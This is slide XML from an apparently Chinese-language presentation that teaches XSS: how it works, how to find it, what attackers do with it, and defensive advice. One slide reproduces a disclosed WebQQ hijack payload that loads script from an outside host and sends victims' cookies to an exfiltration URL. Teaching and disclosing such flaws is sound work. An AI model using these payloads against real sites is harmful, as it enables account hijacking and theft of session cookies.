            <a:endParaRPr lang="zh-CN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000100" y="4857760"/>
            <a:ext cx="156966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注入恶意代码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2500298" y="1571612"/>
            <a:ext cx="4390755" cy="2071702"/>
            <a:chOff x="1357290" y="3214686"/>
            <a:chExt cx="4390755" cy="2071702"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="107" name="组合 106"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1357290" y="3214686"/>
              <a:ext cx="3857652" cy="2071702"/>
              <a:chOff x="714348" y="928670"/>
              <a:chExt cx="3857652" cy="2071702"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="101" name="等腰三角形 100"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="19752380">
                <a:off x="1029631" y="1261494"/>
                <a:ext cx="642942" cy="571504"/>
              </a:xfrm>
              <a:prstGeom prst="triangl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857356" y="1142984"/>
                <a:ext cx="1714512" cy="9286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输入过滤</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>输出过滤</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="103" name="等腰三角形 102"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="19752380">
                <a:off x="3458523" y="1267274"/>
                <a:ext cx="642942" cy="571504"/>
              </a:xfrm>
              <a:prstGeom prst="triangl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00100" y="242886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输入</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US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714744" y="250030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输出</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0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714348" y="928670"/>
                <a:ext cx="3857652" cy="2071702"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:alpha val="18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5286380" y="3714752"/>
              <a:ext cx="461665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126" name="乘号 125"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2571736" y="4572008"/>
              <a:ext cx="500066" cy="500066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000364" y="467034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代码缺陷</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN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000892" y="1142984"/>
            <a:ext cx="15696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查看他人资料</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查看一篇日志</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查看一条留言</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查看一个评论</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查看一个问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查看一个答案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点开一个链接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>点开一个邮件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 rot="5400000">
            <a:off x="7144562" y="492840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00760" y="4857760"/>
            <a:ext cx="156966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恶意代码执行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409613" y="5929330"/>
            <a:ext cx="87716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受害者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929058" y="3857628"/>
            <a:ext cx="118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pc="300" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" spc="300" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>模型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57" name="直接箭头连接符 56"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2857488" y="5072074"/>
            <a:ext cx="29289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0800000">
            <a:off x="1643042" y="6143644"/>
            <a:ext cx="55007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143108" y="5357826"/>
            <a:ext cx="492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当受害者变为攻击者时，下一轮受害者将更容易被攻击，威力更加明显！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754741" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="4754741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397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Flash-based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1214406" y="1000108"/>
            <a:ext cx="1214438" cy="571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受害者</a:t>
            </a:r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>
            <a:off x="2428844" y="1285858"/>
            <a:ext cx="10001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86156" y="1071545"/>
            <a:ext cx="3805238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http://xsst.sinaapp.com/webqqbg.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="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5714969" y="1857358"/>
            <a:ext cx="1255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Iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>调用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="肘形连接符 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4929950" y="1999439"/>
            <a:ext cx="8572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86094" y="2500295"/>
            <a:ext cx="4786312" cy="1477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http://web.qq.com/swf/FileUploader.swf?callback=(function(){function j(w){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>window.s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>('script');</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>window.s.src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>='//xsst.sinaapp.com/'%2bw%2b'.js';document.body.appendChild(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>window.s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)}j('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>jq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>');j('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>wq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>')})()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/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8077169" y="3000358"/>
            <a:ext cx="995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Flash xss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5072825" y="4499752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57656" y="5059345"/>
            <a:ext cx="2360613" cy="369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xsst.sinaapp.com/wq.js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4143344" y="5643545"/>
            <a:ext cx="428625" cy="428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43094" y="6286483"/>
            <a:ext cx="5718175" cy="369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http://xsst.sinaapp.com/getvfqq.php?cookie={Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据</a:t>
            </a:r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16200000" flipV="1">
            <a:off x="2250250" y="5679264"/>
            <a:ext cx="357188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2844" y="5072045"/>
            <a:ext cx="4024312" cy="3698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http://s.web2.qq.com/api/get_self_info2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/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214281" y="5714983"/>
            <a:ext cx="1928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获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>vfwebqq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>参数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rot="16200000" flipV="1">
            <a:off x="892938" y="4464826"/>
            <a:ext cx="571500" cy="71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281" y="3071795"/>
            <a:ext cx="2714625" cy="923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http://cgi.web2.qq.com/keycgi/qqweb/newuac/set.do</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1428719" y="4286233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设置主题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5929281" y="435767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调用外部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JS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5286344" y="5714983"/>
            <a:ext cx="1347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获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookies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rot="5400000" flipH="1" flipV="1">
            <a:off x="607187" y="2250264"/>
            <a:ext cx="1000125" cy="357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32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1285844" y="2285983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劫持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18690" y="428604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腾讯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WEBQQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的持久劫持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6461" y="130710"/>
            <a:ext cx="21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Wooyun-2010-07999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3512413" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="3512413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3155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的挖掘方法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0034" y="1214422"/>
            <a:ext cx="671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 smtClean="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>拿着各种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS Vector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>填入到输入处，然后看页面是否有“执行”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62118"/>
            <a:ext cx="3257550" cy="666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2812" y="1762118"/>
            <a:ext cx="2078080" cy="6429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右箭头 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4197160" y="1936091"/>
            <a:ext cx="357190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71472" y="2714620"/>
            <a:ext cx="6688750" cy="396226"/>
            <a:chOff x="571472" y="2714620"/>
            <a:chExt cx="6688750" cy="396226"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="571472" y="271462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2. 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5215" y="2741514"/>
              <a:ext cx="6345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输入一些可能没有被过滤的字符，</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>"'\/&amp;&lt;&gt;XXXXX</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                <a:t>，看“侧漏”</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US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r="5555"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="674007" y="3286124"/>
            <a:ext cx="2428892" cy="857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 r="8492"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4286248" y="3286124"/>
            <a:ext cx="2714644" cy="85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3571868" y="350043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&amp;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472" y="4416990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看功能异常，看报错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348" y="4929198"/>
            <a:ext cx="2374831" cy="85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05317" y="4929198"/>
            <a:ext cx="2695575" cy="838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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3428992" y="514351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&amp;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7215206" y="1928802"/>
            <a:ext cx="428628" cy="28575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58148" y="1643050"/>
            <a:ext cx="857256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构造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利用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7215206" y="3571876"/>
            <a:ext cx="428628" cy="28575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58148" y="3429000"/>
            <a:ext cx="857256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查明缺陷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7215206" y="5143512"/>
            <a:ext cx="428628" cy="28575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858148" y="5000636"/>
            <a:ext cx="857256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检查原因</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="下箭头 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8072462" y="4286256"/>
            <a:ext cx="357190" cy="42862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 rot="10800000">
            <a:off x="8099356" y="2786058"/>
            <a:ext cx="357190" cy="42862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3512413" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="3512413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3155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的挖掘方法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00034" y="857232"/>
            <a:ext cx="3223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传统输入点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各种表单，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>input[text], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>textarea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zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>隐藏输入点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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Input[hidden]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>客户端脚本过滤</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/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143372" y="928670"/>
            <a:ext cx="357190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3504" y="857232"/>
            <a:ext cx="133882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进一步测试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 rot="1879366">
            <a:off x="3043404" y="2090830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43306" y="2143116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浏览器调试工具 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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>F12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64871" y="25314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抓包工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="右箭头 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18101422">
            <a:off x="5306223" y="1543277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1668" y="3286124"/>
            <a:ext cx="3448050" cy="1362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直接箭头连接符 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286380" y="2714620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右箭头 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19419250">
            <a:off x="3030601" y="2980696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14744" y="2928934"/>
            <a:ext cx="1164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Httpwatch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Fiddler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Charles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5214950"/>
            <a:ext cx="3238500" cy="1123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0" name="直接箭头连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3751257" y="4464057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0034" y="3500438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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>遭遇验证码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rot="10800000" flipV="1">
            <a:off x="2500298" y="3786190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4500570"/>
            <a:ext cx="2809875" cy="1104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TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6715140" y="2000240"/>
            <a:ext cx="164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看到一些提交的隐藏参数。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rot="10800000">
            <a:off x="6143636" y="232894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2896860" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="2896860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25396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的利用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071802" y="1071546"/>
            <a:ext cx="213007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找到一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>点之后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3929058" y="1714488"/>
            <a:ext cx="285752" cy="35719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5008" y="1031205"/>
            <a:ext cx="2453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alert(/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie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71802" y="2285992"/>
            <a:ext cx="2071702" cy="3571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输入点长度限制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8" y="2285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突破长度限制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3929058" y="2857496"/>
            <a:ext cx="285752" cy="35719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1802" y="3357562"/>
            <a:ext cx="2071702" cy="3571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漏洞的利用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00892" y="4772875"/>
            <a:ext cx="180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http-only cookies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71604" y="4429132"/>
            <a:ext cx="1500198" cy="15001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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>蠕虫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57554" y="4429132"/>
            <a:ext cx="1500198" cy="150019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盗取信息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14942" y="4429132"/>
            <a:ext cx="1500198" cy="15001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恶意请求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3929058" y="3929066"/>
            <a:ext cx="285752" cy="35719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00892" y="52028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跨域请求问题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00892" y="5631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代码编写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02868" y="43900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熟悉产品架构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77202" y="335756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恶意代码的隐蔽性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0034" y="285728"/>
            <a:ext cx="1157409" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="1157409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857224" y="28572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总结</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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28596" y="4643446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作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>开发人员</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，要有一定的安全意识，当编写一段代码的时候，要站在攻方的角度，来思考程序的安全性。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作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>安全人员</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，要站在开发人员的角度来思考，推测开发人员的逻辑，寻找缺陷，并加以利用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2786050" y="1071546"/>
            <a:ext cx="3857652" cy="2857500"/>
            <a:chOff x="2714612" y="1071546"/>
            <a:chExt cx="3857652" cy="2857500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="左右箭头 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4286248" y="1714488"/>
              <a:ext cx="2286016" cy="1500198"/>
            </a:xfrm>
            <a:prstGeom prst="left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右箭头 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2714612" y="1785926"/>
              <a:ext cx="2286016" cy="1500198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746" name="Picture 2" descr="http://eeeeee.org/svg/tj/now_tj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14678" y="1071546"/>
              <a:ext cx="2857500" cy="2857500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142976" y="2357430"/>
            <a:ext cx="110799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开发人员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00892" y="2285992"/>
            <a:ext cx="11079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安全人员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034" y="4000504"/>
            <a:ext cx="272382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一切输入都不能忘了过滤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500166" y="3071810"/>
            <a:ext cx="428628" cy="64294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15074" y="4000504"/>
            <a:ext cx="249299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一切输入都可能被利用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7358082" y="3071810"/>
            <a:ext cx="428628" cy="64294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214810" y="285728"/>
            <a:ext cx="1000132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16" y="107154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正确构造利用代码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2910" y="11429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正确过滤恶意代码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43900" y="357187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EXIF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23993" y="32739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二维码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="燕尾形 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2373928">
            <a:off x="6040868" y="1021079"/>
            <a:ext cx="642942" cy="357190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燕尾形 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19226072" flipH="1">
            <a:off x="2897596" y="1021079"/>
            <a:ext cx="642942" cy="357190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7" y="1953768"/>
            <a:ext cx="8429684" cy="297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6600" dirty="0" smtClean="0"/>
              <a:t>谢谢大家        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6600" dirty="0" smtClean="0"/>
              <a:t>" alt="This</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6600" dirty="0" smtClean="0"/>
              <a:t>is the end!"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6600" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="6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214554"/>
            <a:ext cx="1343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>
            <a:off x="4786314" y="3214686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10800000">
            <a:off x="3929058" y="2714620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43174" y="2500306"/>
            <a:ext cx="110799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用户信息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300037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私密信息：日志，相片，邮件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14612" y="3500438"/>
            <a:ext cx="11079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管理信息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0100" y="392906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后台地址，管理员帐号信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>甚至直接通过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上传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4810" y="4286256"/>
            <a:ext cx="13388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客户端信息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43372" y="48577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针对浏览器缺陷实施攻击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rot="10800000" flipV="1">
            <a:off x="4000496" y="3286124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>
            <a:off x="4286248" y="364331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 flipH="1" flipV="1">
            <a:off x="4035421" y="2678901"/>
            <a:ext cx="1215240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7554" y="1571612"/>
            <a:ext cx="226215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突破浏览器的域限制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57290" y="20595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360, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>傲游等浏览器的命令执行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rot="5400000" flipH="1" flipV="1">
            <a:off x="4572000" y="2500306"/>
            <a:ext cx="857256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071934" y="2571744"/>
            <a:ext cx="1143008" cy="11430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00694" y="2285992"/>
            <a:ext cx="140775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Xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>蠕虫攻击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72132" y="3643314"/>
            <a:ext cx="115929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DDoS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57224" y="285728"/>
            <a:ext cx="370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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>攻击可以用来做什么？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="椭圆 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="500034" y="390203"/>
            <a:ext cx="214314" cy="21431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28596" y="1071547"/>
            <a:ext cx="8429684" cy="5429288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="75000">
                <a:schemeClr val="bg1">
                  <a:alpha val="2000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1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500034" y="285728"/>
            <a:ext cx="2520154" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="2520154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857224" y="285728"/>
              <a:ext cx="2162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XSS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
                <a:t>的种类划分</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="椭圆 2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64726" y="2643183"/>
            <a:ext cx="1449820" cy="928693"/>
            <a:chOff x="979040" y="1928802"/>
            <a:chExt cx="1449820" cy="928693"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1071538" y="1928802"/>
              <a:ext cx="1206741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反射型</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>XSS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9040" y="2488163"/>
